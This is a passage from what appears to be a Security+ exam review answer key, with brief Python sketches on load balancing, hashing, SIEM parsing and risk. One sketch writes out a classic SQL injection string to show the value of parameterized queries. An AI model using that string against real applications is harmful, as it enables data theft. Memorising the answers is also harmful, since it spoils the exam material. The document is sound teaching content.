security of the network’s design, and why?
The network architecture should implement network segmentation to put hosts with the same security
requirements within segregated zones. At layer 2, the workstation and database servers should be placed on
separate switches or placed in separate virtual LANs (VLANs). At layer 3, these segments can be identified as
separate subnets.
2. A company must store archived data with very high confidentiality and integrity requirements
on the same site as its production network systems. What type of architecture will best protect
the security requirements of the archive host?
The host can be physically isolated by configuring it with no networking connections, creating an air-gap.
3. Following a data breach perpetrated by an insider threat actor, a company has relocated its
on-premises servers to a dedicated equipment room. The equipment room has a lockable
door, and the servers are installed to lockable racks. Access to keys is restricted to privileged
administrators and subject to sign-out procedures. True or false? These security principles
reduce the attack surface.
True. The attack surface exists at different network layers and includes physical access. Physically restricting
access to server hardware is an important element in reducing the attack surface and mitigating insider
threat.
The switches must support the IEEE 802.1X standard. The Remote Authentication Dial-In User Service
(RADIUS) protocol and Extensible Authentication Protocol (EAP) framework are used within this, but it is
802.1X that is specific to authenticating when connecting to a switch port (and Wi-Fi access points).
5. Two companies are merging and want to consolidate employees at a single site. Neither
company’s on-premises networks have space to add the 100 desktops required. Which
consideration factor does the current architecture model fail to address?
Scalability is the consideration that an architecture should be able to expand to meet additional
requirements or workloads.
Review Activity: Network Security Appliances
1. True or False? As they protect data at the highest layer of the protocol stack, application-based
firewalls have no basic packet filtering functionality.
False. All firewall types can perform basic packet filtering (by IP address, protocol type, port number,
and so on).
2. A proxy server implements a gateway for employee web and email access and is regularly
monitored for compromise. If any compromise is detected, the proxy must enter a fail state
that prevents further access. What type of fail mode is required?
Fail-closed. On failure or compromise, the appliance must block further connections rather than
fail over to unrestricted access.
3. You need to deploy an appliance WAF to protect a web server farm without making any layer
3 addressing changes. Is WAF functionality supported by appliances and, if so, what device
attribute should the appliance support?
A web application firewall (WAF) can be implemented as an appliance or as software running on a general
host. The device must support transparent mode. It could either use layer 2 bridging or a layer 1 inline
(“bump-in-the-wire”) mode.
4. What IPS mechanism can be used to block traffic that violates policy without also blocking the
traffic source?
The intrusion prevention system (IPS) can be configured to reset connections that match rules for traffic that
is not allowed on the network. This halts the potential attack without blocking the source address.
5. True or false? When deploying a non-transparent proxy, clients must be configured with the
proxy address and port.
True. The clients must either be manually configured or use a technology such as proxy auto-configuration
(PAC) to detect the appropriate settings.
The algorithm and metrics that determine which node a load balancer picks to handle a request
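For illustration, two common scheduling algorithms can be sketched as follows (a minimal sketch; the node names and connection counts are hypothetical):

```python
import itertools

class LoadBalancer:
    """Sketch of round-robin and least-connections scheduling."""
    def __init__(self, nodes):
        self.nodes = nodes
        self._rr = itertools.cycle(nodes)
        self.active = {n: 0 for n in nodes}  # current connection count per node

    def round_robin(self):
        """Distribute requests evenly in a fixed rotation."""
        return next(self._rr)

    def least_connections(self):
        """Pick the node currently handling the fewest connections."""
        return min(self.nodes, key=lambda n: self.active[n])

lb = LoadBalancer(["web1", "web2", "web3"])
print([lb.round_robin() for _ in range(4)])  # ['web1', 'web2', 'web3', 'web1']
lb.active.update({"web1": 5, "web2": 1, "web3": 3})
print(lb.least_connections())                # 'web2'
```

Real load balancers add health checks and session persistence on top of the basic scheduling metric.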
Review Activity: Secure Communications
1. True or false? A TLS VPN can only provide access to web-based network resources.
False. A Transport Layer Security (TLS) VPN uses TLS to encapsulate the private network data and tunnel it
over the network. The private network data could be frames or IP-level packets and is not constrained by
application-layer protocol type.
2. What IPsec mode would you use for data confidentiality on a private network?
Transport mode with Encapsulating Security Payload (ESP). Tunnel mode encrypts the IP header information,
but this is unnecessary on a private network. Authentication Header (AH) provides message authentication
and integrity but not confidentiality.
Rather than just providing mutual authentication of the host endpoints, IKEv2 supports a user account
authentication method, such as Extensible Authentication Protocol (EAP).
The server’s public key. This is referred to as the host key. Note that this can only be trusted if the client
trusts that the public key is valid. The client might confirm this manually or using a certificate authority.
5. Server A is configured to forward commands over SSH to a pool of database servers. The
database servers do not accept SSH connections from any other source. What type of
configuration does Server A implement?
Server A is a jump server. A jump server is a specially hardened device designed as a single point of entry for
management and administration traffic for a group of application or database servers in a secure zone. This
is designed to make monitoring and securing connections to the secure zone easier and more reliable.
Review Activity: Cloud Infrastructure
A solution hosted by a third-party cloud service provider (CSP) and shared between subscribers
(multi-tenant). This sort of cloud solution has the greatest security concerns.
Software that manages virtual machines that has been installed to a guest OS. This is in contrast to a Type I
(or "bare metal") hypervisor, which interfaces directly with the host hardware.
4. What is IaC?
IaC, or Infrastructure as Code, is a software engineering practice that manages computing infrastructure
using machine-readable definition files and is closely related to the use of cloud computing infrastructures.
1. What is a purpose-specific operating system with designs heavily focused on high levels of
stability and processing speed?
Real-Time Operating System (RTOS). An RTOS is designed for use in embedded systems and provides
very specific types of functionality based on the implementation.
2. What systems control machinery used in critical infrastructure, such as power suppliers,
water suppliers, health services, telecommunications, and national security services?
Industrial Control Systems (ICS). ICSs are specialized industrial computers designed to operate
manufacturing and industrial sites. They are unique in that their failure can often result in significant
physical damage and loss of life.
3. What are some factors contributing to the poor security characteristics of IoT devices?
• IoT devices are designed to be low cost and focus on functionality rather than security.
• There is low awareness among consumers and organizations about the security risks associated with
IoT devices.
4. What is a network security approach that shifts the focus from defending a network’s
boundaries to protecting individual resources and data within the network?
Deperimeterization. This security approach moves away from traditional “inside” and “outside” network
security approaches and focuses on more granular methods of user and device analysis.
Review Activity: Asset Management
It ensures that each configurable element within an asset inventory has not diverged from its approved
configuration.
Virtual machines (virtualization). They provide quick, point-in-time copies of a virtual machine’s state.
True. As a security precaution, backup media can be taken offline at the completion of a job to mitigate the
risk of malware corrupting the backup.
4. You are advising a company about backup requirements for a few dozen application servers
hosting tens of terabytes of data. The company requires online availability of short-term
backups, plus off-site security media and long-term archive storage. The company cannot use a
cloud solution. What type of on-premises storage solution is best suited to the requirement?
The off-site and archive requirements are best met by a tape solution, but the online requirement may need
a RAID array, depending on speed. The requirement is probably not large enough to demand a storage area
network (SAN), but could be provisioned as part of one.
The process of removing sensitive information from storage media to prevent unauthorized access or data
breaches.
Review Activity: Redundancy Strategies
The maximum tolerable downtime (MTD) metric expresses the availability requirement for a particular
business function.
A scalable system is one that responds to increased workloads by adding resources without exponentially
increasing costs. An elastic system is able to assign or unassign resources as needed to match either an
increased workload or a decreased workload.
3. Which two components are required to ensure power redundancy for an extended power
loss period?
An uninterruptible power supply (UPS) is required to provide failover for the initial power loss event, before
switching over to a standby generator to supply power over a longer period.
RAID provides redundancy among a group of disks, so that if one disk were to fail, that data may be
recoverable from the other disks in the array.
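The parity idea behind striped-with-parity RAID can be sketched with XOR (a toy illustration, not a disk driver; the data blocks are invented):

```python
def xor_bytes(a, b):
    """Byte-wise XOR of two equal-length blocks."""
    return bytes(x ^ y for x, y in zip(a, b))

# Two data blocks striped across disks, plus a parity block (the RAID 5 idea).
disk1 = b"\x01\x02\x03\x04"
disk2 = b"\x10\x20\x30\x40"
parity = xor_bytes(disk1, disk2)

# If disk1 fails, its contents are rebuilt from the surviving members,
# because XOR is its own inverse: parity ^ disk2 == disk1.
rebuilt = xor_bytes(parity, disk2)
print(rebuilt == disk1)  # True
```

The same XOR relationship holds across any number of member disks, which is why a RAID 5 array survives the loss of exactly one disk.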
Review Activity: Physical Security
Lighting is one of the most effective deterrents. Any highly visible security control (guards, fences, dogs,
barricades, CCTV, signage, and so on) will act as a deterrent.
One type of proximity reader allows a lock to be operated by a contactless smart card. Proximity sensors can
also be used to track objects via RFID tags.
3. What type of sensor detects changes in heat patterns caused by moving objects?
Infrared
4. What is a bollard?
A short vertical post typically made of steel, concrete, or other similarly durable material and designed to
restrict vehicular traffic into pedestrian areas.
Review Activity: Device and OS Vulnerabilities
1. You are recommending that a business owner invest in patch management controls for PCs and
laptops. What is the main risk from weak patch management procedures on such devices?
Vulnerabilities in the OS and applications software such as web browsers and document readers or in PC
and adapter firmware can allow threat actors to run malware and gain a foothold on the network.
2. You are advising a business owner on security for a PC running Windows 7. The PC runs process
management software that the owner cannot run on Windows 11. What are the risks arising
from this, and how can they be mitigated?
Windows 7 is a legacy platform that is no longer receiving security updates. This means that patch
management cannot be used to reduce risks from software vulnerabilities. The workstation should be
isolated from other systems to reduce the risk of compromise.
3. As a security solution provider, you are compiling a checklist for your customers to assess
potential vulnerabilities. What vulnerability do the following items relate to? Default settings,
unsecured root accounts, open ports and services, unsecure protocols, weak encryption, errors.
Misconfiguration. Each of these items indicates a system or service whose configuration weakens
security, rather than a flaw in the software itself.
1. Your log shows that the Notepad process on a workstation running as the local administrator
account has started an unknown process on an application server running as the SYSTEM
account. What type of attack(s) are represented in this intrusion event?
The Notepad process has been compromised, possibly using buffer overflow or a DLL/process injection
attack. The threat actor has then performed lateral movement and privilege escalation, gaining higher
privileges through remote code execution on the application server.
Malicious updates describe updates typically downloaded from the trusted hardware or software vendor
that include malware. This is a result of the vendor’s environment being exploited.
3. What type of attack is focused on exploiting the database access provided to a web application?
SQL injection. SQLi attacks manipulate the way web applications handle inputs to gain access to protected
resources stored in a database or manipulate web application behavior.
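A minimal sketch of the mitigation implied by this answer, using an in-memory SQLite table as a hypothetical stand-in for the web application's back-end database, shows why parameterized queries defeat the input manipulation while string concatenation does not:

```python
import sqlite3

# Stand-in for the web application's database (schema and rows invented).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

payload = "' OR '1'='1"  # classic injection string submitted via a form

# Unsafe: the payload rewrites the WHERE clause and returns every row.
unsafe = conn.execute(
    "SELECT * FROM users WHERE name = '" + payload + "'").fetchall()

# Safe: the driver binds the payload as a literal value, matching nothing.
safe = conn.execute(
    "SELECT * FROM users WHERE name = ?", (payload,)).fetchall()

print(len(unsafe), len(safe))  # unsafe returns 1 row, safe returns 0
```

The `?` placeholder ensures the input is treated as data, never as part of the SQL statement.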
1. You have received an urgent threat advisory and need to configure a network vulnerability scan
to check for the presence of a related CVE on your network. What configuration check should
you make in the vulnerability scanning software before running the scan?
Verify that the vulnerability feed/plug-in/test has been updated with the specific CVE that you need to
test for.
2. Your CEO wants to know if the company’s threat intelligence platform makes effective use of
open-source intelligence (OSINT). What explanation can you give?
Open-source intelligence (OSINT) is cybersecurity-relevant information harvested from public websites and
data records. In terms of threat intelligence specifically, it refers to research and data feeds that are made
publicly available.
3. A small company that you provide security consulting support to has resisted investing in an
event management and threat intelligence platform. The CEO has become concerned about an
APT risk known to target supply chains within the company’s industry sector and wants you to
scan their systems for any sign that they have been targeted already. What are the additional
challenges of meeting this request, given the lack of investment?
Collecting network traffic and log data from multiple sources and then analyzing it manually will require
many hours of analyst time. The use of threat feeds and intelligence fusion to automate parts of this analysis
effort would enable a much swifter response.
2. A vulnerability scan reports that a CVE associated with CentOS Linux is present on a host, but
you have established that the host is not running CentOS. What type of scanning error event
is this?
False positive
3. This type of policy can provide financial protection in case of a security breach resulting
from a vulnerability.
Cybersecurity insurance. These policies are designed to cover a majority of the expenses related to
remediating and recovering from a cyber incident.
Review Activity: Network Security Baselines
This is a type of group authentication used when the infrastructure for authenticating securely (via RADIUS,
for instance) is not available. The system depends on the strength of the passphrase used for the key.
No, an enterprise network will use RADIUS authentication. WPS uses PSK, and there are weaknesses in the
protocol.
3. You want to deploy a wireless network where only clients with domain-issued digital certificates
can join the network. Which authentication method should you choose?
EAP-TLS is the best choice because it requires that both server and client be installed with valid certificates.
Some network access control (NAC) solutions perform host health checks via a local agent, running on
the host. A dissolvable agent is one that is executed in the host’s memory and CPU but not installed to a
local disk.
By using two firewalls (external and internal) around a screened subnet, or by using a triple-homed firewall
(one with three network interfaces)
Installing definition/signature updates and removing definitions that are not relevant to the hosts or services
running on your network.
4. What is the principal risk of deploying an intrusion prevention system with behavior-based
detection?
Behavior-based detection can exhibit high false positive rates, where legitimate activity is wrongly identified
as malicious. With automatic prevention, this will block many legitimate users and hosts from the network,
causing availability and support issues.
Review Activity: Endpoint Security
A basic principle of security is to run only services that are needed. A hardened system is configured to
perform a role as client or application server with the minimal possible attack surface in terms of interfaces,
ports, services, storage, system/registry permissions, lack of security controls, and vulnerabilities.
2. True or false? Only Microsoft’s operating systems and applications require security patches.
False. Any vendor’s or open source software or firmware can contain vulnerabilities that need patching.
3. Why are OS-enforced file access controls not sufficient in the event of the loss or theft of a
computer or disk?
The disk (or other storage) could be attached to a foreign system, and the administrator could take
ownership of the files. File-level encryption, full disk encryption (FDE), or self-encrypting drives (SEDs) mitigate this by
requiring the presence of the user’s decryption key to read the data.
Review Activity: Mobile Device Hardening
1. What type of deployment model(s) allow users to select the mobile device make and model?
Bring your own device (BYOD) and choose your own device (CYOD)
2. Company policy requires that you ensure your smartphone is secured from unauthorized access
in case it is lost or stolen. To prevent someone from accessing data on the device immediately
after it has been turned on, what security control should be used?
Screen lock
3. True or false? A maliciously designed USB battery charger could be used to exploit a mobile
device on connection.
True. Though the vector is known to the mobile OS and handset vendors, the exploit often requires user
interaction.
4. Why might enforcement policies be used to prevent USB tethering when a smartphone is
brought to the workplace?
This would allow a PC or laptop to connect to the Internet via the smartphone’s cellular data connection. This
could be used to evade network security mechanisms, such as data loss prevention or content filtering.
1. What type of attack against HTTPS aims to force the server to negotiate weak ciphers?
A downgrade attack
2. When using S/MIME, which key is used to protect the confidentiality of a message?
The recipient’s public key (principally). The public key is used to encrypt a symmetric session key, and (for
performance reasons) the session key does the actual data encoding. The session key and, therefore, the
message text can then only be recovered by the recipient, who uses the linked private key to decrypt it.
Secure Shell (SSH) provides the same remote terminal functionality as Telnet but incorporates encryption
protections by default.
4. True or false? DNSSEC depends on a chain of trust from the root servers down.
True. The authoritative server for the zone creates a "package" of resource records (called an RRset) signed
with a private key (the Zone Signing Key). When another server requests a secure record exchange, the
authoritative server returns the package along with its public key, which can be used to verify the signature.
1. What type of programming practice defends against injection-style attacks, such as inserting
SQL commands into a database application from a site search form?
Input validation provides some mitigation against this type of input being passed to an application via a user
form. Output encoding could provide another layer of protection by checking that the query that the script
passes to the database is safe.
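The two layers mentioned above can be sketched in Python. The allow-list pattern and the search-form context are assumptions for illustration, not a recommendation for any specific application:

```python
import html
import re

# Layer 1: allow-list input validation for a hypothetical search term.
# The permitted character set is an assumption for this example.
SEARCH_TERM = re.compile(r"^[A-Za-z0-9 .,-]{1,64}$")

def is_valid(term: str) -> bool:
    """Reject input that does not match the expected character set."""
    return bool(SEARCH_TERM.fullmatch(term))

# Layer 2: output encoding, so characters that do slip through are
# rendered inert when reflected into an HTML results page.
def render(term: str) -> str:
    return "<p>Results for: " + html.escape(term) + "</p>"

assert is_valid("laptop stands")
assert not is_valid("<script>alert(1)</script>")
assert render("<b>") == "<p>Results for: &lt;b&gt;</p>"
```

Defense in depth applies here: validation narrows what input is accepted, and encoding neutralizes whatever remains.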
A default error message might reveal platform information and the workings of the code to an attacker.
Static code analysis is designed to inspect software at the source-code level to identify and report on
insecure coding practices. Static code analysis tools are often incorporated into software development
environments to automatically flag insecure code and encourage developers to focus on secure
development practices.
Review Activity: Incident Response
1. What are the seven processes in the CompTIA incident response lifecycle?
Preparation; detection; analysis; containment; eradication; recovery; and lessons learned.
2. True or false? The "first responder" is whoever first reports an incident to the CIRT.
False. The first responder is the first member of the computer incident response team (CIRT) to handle
the report.
3. True or false? It is important to publish all security alerts to all members of staff.
False. Security alerts should be sent to those able to deal with them at a given level of security awareness
and on a need-to-know basis.
4. You are providing security consultancy to assist a company with improving incident response
procedures. The business manager wants to know why an out-of-band contact mechanism for
responders is necessary. What do you say?
The response team needs a secure channel to communicate over without alerting the threat actor. There
may also be availability issues with the main communication network if it has been affected by the incident.
5. Your consultancy includes a training segment. What type of incident response exercise will best
represent a practical incident handling scenario?
A simulation exercise creates an actual intrusion scenario, with a red team performing the intrusion and a
blue team attempting to identify, contain, and eradicate it.
Review Activity: Digital Forensics
The evidence cannot be seen directly but must be interpreted, so the validity of the interpretation process
must be unquestionable.
2. You’ve fulfilled your role in the forensic process, and now you plan on handing the evidence
over to an analysis team. What important process should you observe during this transition,
and why?
It’s important to uphold a record of how evidence is handled in a chain of custody. The chain of custody will
help verify that everyone who handled the evidence is accounted for, including when the evidence was in
each person’s custody. This is an important tool in validating the evidence’s integrity.
3. True or false? To ensure evidence integrity, you must make a hash of the media before making
an image.
True
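The hash-then-image workflow can be sketched with a streaming hash helper. The device and image paths in the comments are hypothetical, and a real acquisition would use a write blocker and a forensic imaging tool:

```python
import hashlib

def sha256_of(path: str, chunk_size: int = 1 << 20) -> str:
    """Stream a device or image file through SHA-256 in chunks, so even
    very large media can be hashed without loading them into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        while chunk := f.read(chunk_size):
            digest.update(chunk)
    return digest.hexdigest()

# Hash the source media first, make the image, then hash the image;
# matching digests demonstrate the copy is bit-for-bit identical.
# before = sha256_of("/dev/sdb")       # hypothetical source device
# after = sha256_of("evidence.img")    # hypothetical image file
# assert before == after
```

Recording both digests in the case notes ties the image back to the original media and supports the chain of custody.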
4. You must recover the contents of the ARP cache as vital evidence of an on-path attack. Should
you shut down the PC and image the hard drive to preserve it?
No, the ARP cache is stored in memory and will be discarded when the computer is powered off. You can
either dump the system memory or run the ARP utility and make a screenshot. In either case, make sure that
you record the process and explain your actions.
Review Activity: Data Sources
1. Your manager has asked you to prepare a summary of the usefulness of different kinds of log
data. You have sections for firewall, application, OS-specific security, IPS/IDS, and network logs
plus metadata. Following the CompTIA Security+ exam objectives, which additional log data
type should you cover?
Endpoint logs. These are typically security logs from detection suites that perform antivirus scanning and
enforce policies.
2. You must assess a security monitoring suite for its dashboard functionality. What is the general
use of dashboards?
A dashboard provides a console to work from for day-to-day incident response. It provides a summary
of information drawn from the underlying data sources to support some work task. Most tools allow the
configuration of different dashboards for different tasks. A dashboard can show uncategorized events and
visualizations of key metrics and status indicators.
3. True or false? It is not possible to set custom file system audit settings when using security log
data.
False. File system audit settings are always configurable. This type of auditing can generate a large amount
of data, so the appropriate settings are often different from one context to another.
4. What type of data source supports frame-by-frame analysis of an event that generated an
IDS alert?
Packet capture means that the frames of network traffic that triggered an intrusion detection system (IDS)
alert are recorded and stored in the monitoring system. The analyst can pivot from the alert to view the
frames in a protocol analyzer.
Review Activity: Alerting and Monitoring Tools
Security information and event management (SIEM) products aggregate IDS alerts and host logs from
multiple sources, then perform correlation analysis on the observables collected to identify indicators of
compromise and alert administrators to potential incidents.
2. What is the difference between a sensor and a collector, in the context of SIEM?
A SIEM collector receives log data from a remote host and parses it into a standard format that can be
recorded within the SIEM and interpreted for event correlation. A sensor (or sniffer) copies data frames
from the network, using either a mirror port on a switch or some type of media tap.
3. Your company has implemented a SIEM but found that there is no parser for logs generated by
the network’s UTM gateway. Why is a parser necessary?
Security information and event management (SIEM) aggregates data sources from multiple hosts and
appliances, including unified threat management (UTM). A parser translates the event attributes and data
used by the UTM to standard fields in the SIEM’s event database. This normalization process is necessary for
the correlation of event data generated by different sources.
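Normalization can be illustrated with a small parser sketch. The UTM log line format and the field names here are invented for the example, not any real vendor's schema:

```python
import re

# Hypothetical vendor log format, mapped to standard SIEM field names.
UTM_PATTERN = re.compile(
    r"(?P<date>\S+ \S+) fw: (?P<action>\w+) "
    r"src=(?P<src_ip>\S+) dst=(?P<dst_ip>\S+) port=(?P<port>\d+)"
)

def parse_utm(line: str) -> dict:
    """Normalize one vendor-specific log line into common schema fields."""
    m = UTM_PATTERN.match(line)
    if m is None:
        raise ValueError("unparseable line: " + line)
    event = m.groupdict()
    event["port"] = int(event["port"])  # coerce to the schema's type
    return event

line = "2024-05-01 10:31:07 fw: DROP src=198.51.100.7 dst=10.0.0.5 port=3389"
print(parse_utm(line)["src_ip"])  # 198.51.100.7
```

Once every source's events share field names and types, the SIEM can correlate, say, `src_ip` across firewall, IDS, and endpoint events.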
4. Your manager has asked you to prepare a summary of the activities that support alerting and
monitoring. You have sections for log aggregation, alerting, scanning, reporting, and alert
response and remediation/validation (including quarantine and alert tuning). Following the
CompTIA Security+ exam objectives, which additional activity should you cover?
Archiving means that there is a store of event data that can be called upon for retrospective investigations,
such as threat hunting. Archiving also meets compliance requirements to preserve information. As the
volume of live data can pose problems for SIEM performance, archived data is often moved to a separate
long-term storage area.
5. You are supporting a SIEM deployment at a customer’s location. The customer wants to know
whether flow records can be ingested. What type of monitoring tool generates flow records?
Flow records are generated by NetFlow or IP Flow Information Export (IPFIX) probes. A flow record is data
that matches a flow label, which is a particular combination of keys (IP endpoints and protocol/port types).
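The aggregation of packets into flow records can be sketched as follows. The packet tuples are invented sample data, and a real probe tracks many more counters (packet counts, timestamps, TCP flags) per flow:

```python
from collections import Counter

# Each packet reduced to (src, dst, protocol, src port, dst port, bytes).
packets = [
    ("10.0.0.5", "203.0.113.9", "tcp", 52100, 443, 1420),
    ("10.0.0.5", "203.0.113.9", "tcp", 52100, 443, 60),
    ("10.0.0.8", "198.51.100.2", "udp", 5353, 53, 90),
]

# The flow key is the combination of endpoints and protocol/ports;
# per-key totals become the exported flow record.
flows = Counter()
for src, dst, proto, sport, dport, size in packets:
    flows[(src, dst, proto, sport, dport)] += size

for key, total_bytes in flows.items():
    print(key, total_bytes)
# The first two packets share a flow key, so they collapse into one
# record totaling 1480 bytes.
```

Exporting flow records rather than full packets gives the SIEM traffic metadata at a fraction of the storage cost of packet capture.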
Review Activity: Malware Attack Indicators
1. You are troubleshooting a user’s workstation. At the computer, an app window displays on the
screen claiming that all of your files are encrypted. The app window demands that you make an
anonymous payment if you ever want to recover your data. What type of malware has infected
the computer?
This is some type of ransomware, but you will have to investigate resource inaccessibility to determine
whether it is actually crypto-ransomware, or a "scareware" variant that is easier to remediate.
2. You are recommending different antivirus products to the CEO of a small travel services firm.
The CEO is confused because they had heard that Trojans represent the biggest threat to
computer security these days. What explanation can you give?
While "antivirus (A-V) scanner" remains a popular marketing description, all current security products worthy
of consideration will try to provide protection against a full range of malware and bloatware threats.
3. You are writing a security awareness blog for company CEOs subscribed to your threat platform.
Why are backdoors and Trojans different ways of classifying and identifying malware risks?
A Trojan means a malicious program masquerading as something else; a backdoor is a covert means of
accessing a host or network. A Trojan need not necessarily operate a backdoor, and a backdoor can be
established by exploits other than using Trojans. The term "remote access Trojan (RAT)" is used for the
specific combination of Trojan and backdoor.
4. You are investigating a business email compromise (BEC) incident. The email account of a
developer has been accessed remotely over webmail. Investigating the developer’s workstation
finds no indication of a malicious process, but you do locate an unknown USB extension
device attached to one of the rear ports. Is this the most likely attack vector, and what type of
malware would it implement?
It is likely that the USB device implements a hardware-based keylogger. This would not necessarily require
any malware to be installed or leave any trace in the file system.
5. A user’s computer is performing extremely slowly. Upon investigating, you find that a process
named n0tepad.exe is utilizing the CPU at rates of 80%–90%. This is accompanied by continual
small disk reads and writes to a temporary folder. Should you suspect malware infection, and is
any particular class of malware indicated?
Yes, this is malware as the process name is trying to masquerade as a legitimate process. It is not possible
to conclusively determine the type without more investigation, but you might initially suspect a cryptominer/
cryptojacker.
Review Activity: Network Attack Indicators
Where the attacker spoofs the victim’s IP in requests to several reflecting servers (often DNS or NTP servers).
The attacker crafts the request so that the reflecting servers respond to the victim’s IP with a large message,
overwhelming the victim’s bandwidth.
Most attacks depend on overwhelming the victim. This typically requires a large number of hosts, or bots.
3. Users in a particular wireless network segment are complaining that websites are frequently
slow to load or unavailable or filled with advertising. On investigation, each host in the segment
is set to use an unauthorized DNS resolver. Which attack type is the likely cause for this?
The hosts are likely to be receiving their configuration from a malicious Dynamic Host Configuration Protocol
(DHCP) server. This is likely to have been achieved via an on-path attack, such as a rogue access point or evil
twin access point.
4. The security log on a domain controller has recorded numerous unsuccessful attempts to read
the NTDS.DIT file by three different client workstation computer accounts. What specific type of
attack is this a precursor for?
NTDS.DIT stores credentials for an Active Directory network. Obtaining a copy of it allows a threat actor to
perpetrate offline password attacks. An offline password attack could use brute force, dictionary, or hybrid
cracking techniques.
Review Activity: Application Attack Indicators
The attacker captures some data, such as a cookie, used to log on or start a session legitimately. The attacker
then resends the captured data to re-enable the connection.
2. You are reviewing access logs on a web server and notice repeated requests for URLs containing
the strings %3C and %3E. Is this an event that should be investigated further, and why?
Those strings are percent-encoded HTML tag delimiters (< and >). This could be an injection attack,
so it should be investigated.
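A triage check along these lines might be sketched as follows. The decode-and-flag heuristic is an illustration of the idea, not a production detector, and the sample URLs are invented:

```python
from urllib.parse import unquote

# Decode percent-encoded request paths and flag any that contain HTML
# tag delimiters, a common marker of attempted script injection.
SUSPICIOUS = ("<", ">")

def flag(url_path: str) -> bool:
    decoded = unquote(url_path)
    return any(ch in decoded for ch in SUSPICIOUS)

print(flag("/search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"))  # True
print(flag("/search?q=cheap+flights"))                        # False
```

Decoding before matching matters: a filter that only scans the raw log line for `<` would miss the `%3C` form entirely.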
3. You are improving back-end database security to ensure that requests deriving from front-end
web servers are authenticated. What general class of attack is this designed to mitigate?
Server-side request forgery (SSRF) causes a public server to make an arbitrary request to a back-end server.
This is made much harder if the threat actor has to defeat an authentication or authorization mechanism
between the web server and the database server.
4. A technician is seeing high volumes of 403 Forbidden errors in a log. What type of network
appliance or server is producing these logs?
403 Forbidden is an HTTP status code, so most likely a web server. Another possibility is a web proxy or
gateway.
1. This policy outlines the acceptable ways in which network and computer systems may be used.
An acceptable use policy (AUP).
Change management describes the policies and procedures dictating how changes can be made in the
environment. Configuration management describes the technical tools used to manage, enforce, and deploy
changes to software and endpoints.
3. What are a few examples of the types of capabilities that may be included in a password
standard?
Approved hashing algorithms, password salting methods, secure password transmission methods, password
reset methods, password manager requirements.
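Several of these items (salting, an approved hashing algorithm, verification) can be sketched with the standard library's PBKDF2 support. The iteration count is an illustrative assumption, and a real password standard might instead mandate bcrypt, scrypt, or Argon2:

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # illustrative work factor, set by policy

def hash_password(password: str) -> tuple[bytes, bytes]:
    salt = os.urandom(16)  # unique per-user salt defeats rainbow tables
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)  # constant-time compare

salt, digest = hash_password("correct horse battery staple")
assert verify("correct horse battery staple", salt, digest)
assert not verify("wrong guess", salt, digest)
```

Only the salt and digest are stored; the password itself never touches the database.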
Review Activity: Change Management
A backout plan is a contingency plan for reversing changes and returning systems and software to their
original state if the implementation plan fails.
System dependencies describe the interconnection of systems and software. Dependencies may cause an
otherwise simple change to have severe and widespread impacts attributed to the fact that a single changed
component may break functionality in other systems.
Review Activity: Automation and Orchestration
APIs are the enabling feature allowing different platforms and tools to interact with each other. APIs allow
security tools to work together and perform rule-based actions to perform tasks previously handled by
security analysts.
Operator fatigue refers to the mental exhaustion experienced by cybersecurity professionals due to their
work’s continuous, high-intensity nature.
3. Identify a few of the potential issues associated with automation and orchestration.
Complexity, cost, single point of failure, technical debt, and ongoing support burdens
1. What metric(s) could be used to make a quantitative calculation of risk due to a specific threat?
Single Loss Expectancy (SLE) or Annual Loss Expectancy (ALE). ALE is SLE multiplied by ARO (annual rate of
occurrence).
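A worked example of these formulas, with invented figures (SLE itself is commonly calculated as asset value multiplied by an exposure factor):

```python
# Quantitative risk calculation with illustrative numbers.
asset_value = 200_000        # value of the asset at risk ($)
exposure_factor = 0.25       # fraction of value lost per incident
aro = 2                      # annual rate of occurrence (incidents/year)

sle = asset_value * exposure_factor  # single loss expectancy
ale = sle * aro                      # annual loss expectancy

print(f"SLE = ${sle:,.0f}, ALE = ${ale:,.0f}")  # SLE = $50,000, ALE = $100,000
```

The ALE figure gives a ceiling for how much it is rational to spend per year on controls that mitigate this specific threat.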
Risk transference
A document highlighting the results of risk assessments in an easily comprehensible format (such as a heat
map or "traffic light" grid). Its purpose is for department managers and technicians to understand risks
associated with the workflows that they manage.
Review Activity: Vendor Management Concepts
1. This describes a contractual provision that grants an organization the authority to conduct
audits or assessments of vendor operational practices, information systems, and security
controls.
A right-to-audit clause. The right-to-audit clause supports vendor assessment practices by allowing
organizations to validate and verify the vendor’s compliance with contractual obligations, security
standards, and regulatory requirements.
2. Describe the concept of conflict of interest in relation to vendor management practices.
Answers will vary. A conflict of interest arises when an individual or organization has competing interests
or obligations that could compromise their ability to act objectively, impartially, or in the best interest of
another party.
3. This legal contract is a nonbinding agreement that outlines the intentions, shared goals, and
planned cooperation between two or more parties.
A memorandum of understanding (MOU).
4. This legal document establishes clear guidelines for the vendor’s behavior, activities, and access
to sensitive information.
Rules of engagement. These rules define the parameters and expectations for vendor relationships. These
rules outline the responsibilities, communication methods, reporting mechanisms, security requirements,
and compliance obligations that vendors must adhere to.
Review Activity: Penetration Testing Concepts
1. A website owner wants to evaluate whether the site security mitigates risks from criminal
syndicates, assuming no risk of insider threat. What type of penetration testing engagement
will most closely simulate this adversary capability and resources?
A threat actor has no privileged information about the website configuration or security controls. This is
simulated in an unknown environment penetration test engagement.
2. Why should an Internet service provider (ISP) be informed before pen testing on a hosted
website takes place?
ISPs monitor their networks for suspicious traffic and may block the test attempts. The pen test may
also involve equipment owned and operated by the ISP and not authorized to be included as part of the
assessment.
3. This type of assessment allows individuals or organizations to evaluate their own performance,
practices, and adherence to established criteria against predetermined metrics and measures.
Self-assessments. Self-assessments help identify strengths, weaknesses, and areas for improvement,
enabling individuals or organizations to take proactive measures to enhance their effectiveness and
outcomes.
Answers will vary. The importance of independent third-party audits lies in their ability to offer an external
perspective, free from any conflicts of interest or bias.
1. What range of information classifications could you implement in a data labeling project?
One set of tags could indicate the degree of confidentiality (public, confidential/secret, or critical/top secret).
Another tagging schema could distinguish proprietary from private/sensitive personal data.
Privacy information is any data that could be used to identify, contact, or locate an individual.
3. You are reviewing security and privacy issues relating to a membership database for a
